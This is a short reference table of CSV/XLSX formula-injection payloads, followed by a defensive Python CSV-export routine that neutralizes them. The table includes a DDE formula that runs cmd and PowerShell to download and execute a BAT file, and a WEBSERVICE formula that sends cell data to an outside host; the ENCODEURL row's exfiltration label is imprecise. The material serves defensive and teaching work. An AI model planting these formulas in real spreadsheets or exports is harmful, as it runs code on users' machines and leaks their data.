CSV/XLSX formula injection

Formula                                                                             Description
----------------------------------------------------------------------------------  ----------------------------------------
=cmd|' /C calc'!xxx                                                                 Launch calc.exe
=HYPERLINK("https://www.google.com/","here")                                        Link to https://www.google.com/
=cmd|'/C powershell iex(wget "<server/m.bat>" -OutFile "C:/m.bat"); "C:/m.bat"'!A0  Download a BAT file and execute it
=WEBSERVICE("https://example.com/?data="&A1)                                        Data exfiltration of spreadsheet content
=ENCODEURL(A1)                                                                      Data exfiltration of spreadsheet content
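
Added example (not part of the original page): a defensive CSV export routine that neutralizes cells such as the formulas listed above before they reach a spreadsheet application. The function names and sample rows are constructed for illustration, and the set of trigger characters is an assumption based on OWASP's CSV injection guidance.

```python
import csv
import io
import re

# Leading characters that spreadsheet applications may treat as the start of
# a formula or DDE expression (assumption: the set from OWASP's CSV injection
# guidance, plus line feed).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")
PLAIN_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")


def neutralize_cell(value):
    """Return the cell as text that a spreadsheet will not evaluate."""
    text = "" if value is None else str(value)
    if PLAIN_NUMBER.fullmatch(text):
        return text  # signed numbers such as -12.5 stay usable as numbers
    # Conservative: also catch a trigger hidden behind leading spaces.
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text  # a leading apostrophe forces the cell to text
    return text


def export_csv(rows):
    """Write rows to CSV with every field neutralized and quoted."""
    buf = io.StringIO()
    # QUOTE_ALL wraps each field in double quotes and doubles embedded quotes,
    # so a payload cannot break out of its own field.
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample rows: user-controlled "note" values reuse formulas from
# the table above; "balance" holds legitimate signed numbers.
SAMPLE_ROWS = [
    ["name", "note", "balance"],
    ["alice", '=HYPERLINK("https://www.google.com/","here")', "-12.5"],
    ["bob", '=WEBSERVICE("https://example.com/?data="&A1)', "40"],
    ["carol", "=cmd|' /C calc'!xxx", "+7"],
    ["dave", "  =ENCODEURL(A1)", "@SUM(1,1)"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
```

The apostrophe prefix changes the stored value, so any system that re-imports the exported file needs to strip it again.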